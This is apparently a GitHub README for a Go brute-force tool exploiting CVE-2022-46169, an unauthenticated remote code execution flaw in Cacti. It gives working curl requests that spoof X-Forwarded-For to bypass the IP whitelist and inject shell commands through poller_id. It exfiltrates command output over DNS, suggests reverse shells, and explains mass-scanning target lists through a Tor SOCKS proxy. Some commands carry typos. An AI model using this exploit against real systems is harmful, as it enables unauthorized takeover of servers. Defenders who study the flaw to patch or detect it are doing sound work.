/CVE-2022-46169

CVE-2022-46169 - Cacti Blind Remote Code Execution (Pre-Auth)

Primary LanguageGo

CVE-2022-46169

Cacti Blind Remote Code Execution (Pre-Auth)

Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

Explanation

This script bruteforces variables required to exploit this vulnerability. This exploit requires the following 3 variables:

  • Whitelisted IP address
  • Correct host_id parameter
  • Correct local_data_ids parameter

The file remote_agent.php is protected by a IP whitelist. You can bypass this by spoofing your IP address in the X-Forwarded-IP header. Most instances will have 127.0.0.1 or the server's own IP address whitelisted.

Next you need to bruteforce the host_id and local_data_ids request parameters. This is done by enumerating pairs of integers x,y from a default min value of 1 and max value of 10.

Example Request

pair_x="1"
pair_y="2"
curl -k -H "X-Forwarded-For: 127.0.0.1" \
    "https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pari_x&=local_data_ids[]=$pair_y"

[]

Exploitation

After you've gotten these 3 variables, you can inject a shell command into the poller_id key and escape it by putting a ; before your command.

This is a blind RCE, so you need to send the output of your command somewhere like interact.sh or open a reverse shell. Remember to URL encode your the poller_id value!

The following executes the command ping $(whoami).test.com

curl -k -H "X-Forwarded-For: 127.0.0.01" \
    "https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com"

Output

The script oututs in a CSV format. The headers are "target", "ip", "host_id", "data_id", "url".

If the url value is missing, it means the script was able to bypass the IP restriction but not successfully bruteforce the IDs. You can take this output and set a higher max value to attempt again.

Parsing Output

You can use the following commands to quickly parse the output file

Targets with IP restriction bypassed

tail -n +2 results.csv | cut -d ',' -f1 | sort -u

Exploitable Targets

tail -n +2 results.csv | cut -d ',' -f5 | sort -u

Build

go build -v -o bruteforce bruteforce.go

Usage

./bruteforce -l targets.txt -t 50 -min 1 -max 10
  • Targets must be a list of IP addresses, port may be omitted
  • Socks5 proxy is supported -proxy socks5://127.0.0.1:9050
  • Default output file is results.csv